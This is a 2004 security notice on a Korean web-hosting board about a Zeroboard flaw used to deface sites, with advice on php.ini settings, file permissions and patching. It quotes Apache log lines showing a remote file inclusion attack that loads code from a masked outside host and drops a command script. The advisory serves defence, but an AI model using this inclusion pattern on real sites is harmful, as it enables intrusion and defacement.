아이디 저장   보안접속



     회원가입
     아이디 / 비밀번호 찾기
 게시판
  공지사항
  자주묻는질문
 질문 답변 게시판
  웹호스팅
  EC호스팅
  서버컨설팅
  도메인
  결제시스템
  예짱시리즈
  서비스 신청문의
  서비스 연장문의
  서비스 기타문의
   작성자: (nobinea) http://ye.ro
   글 작성시간: 2004-12-27 21:44:11
   제목: 이전에 올라온 글 [긴급공지] 제로보드 패치를 하여 웹 해킹을 방지 하세요.   

최근 제로보드의 취약점을 이용하여 특정 파일변경, 수정, 보기, 삭제 등이 가능하여 이를 통한 사고가 발생하고 있습니다.
특히 계정 내 폴더, 파일 권한이 nobody, 777, 707 인 경우 발생 합니다.

아래 내용은 해킹 사례로 제로보드를 통해index.htm을 변조하는 과정이 아파치 로그에 남은 기록입니다.

www.xxxxxxxxx.com 212.138.47.26 - - [27/Dec/2004:03:33:25 +0900] "GET /xxxx/bbs/include/write.php?dir=http://xxx.xxxx.xxx/safe20.dat?&chdir=/free/home/xxxx/html/xxxxx/bbs/include/... HTTP/1.0" 200 171327 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.xxxxxxxxx.com 212.138.47.20 - - [27/Dec/2004:03:33:50 +0900] "GET /xxxx/bbs/include/write.php?dir=http://xxx.xxxx.xxx /filed.dat?&inclvar=dir&o=/free/home/xxxx/html/xxxx/bbs/write_cmd.php HTTP/1.0" 200 5907 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"

해킹을 방지 하기 위해 서버 관리자는 php.ini 파일에 allow_url_fopen = Off 으로 변경 해야 하며, 계정 내 폴더나 파일 권한은 꼭 필요한 경우 외에는 755이하로 설정을 해야 합니다.

또한 제로보드(http://www.nzeo.com/?channel=zeroboard) 공식 사이트를 통하여 최근 버전으로 반드시 패치 하셔야 합니다.

감사합니다.  


  이전에 올라온 글 갑신년 새해에도 복 많이 받으세요. 2004/12/31 1569
  이전에 올라온 글 [공지] 나야나 백본망 스위치 보안/필터링 장비 추가 ... 2004/12/20 1788
    




SSL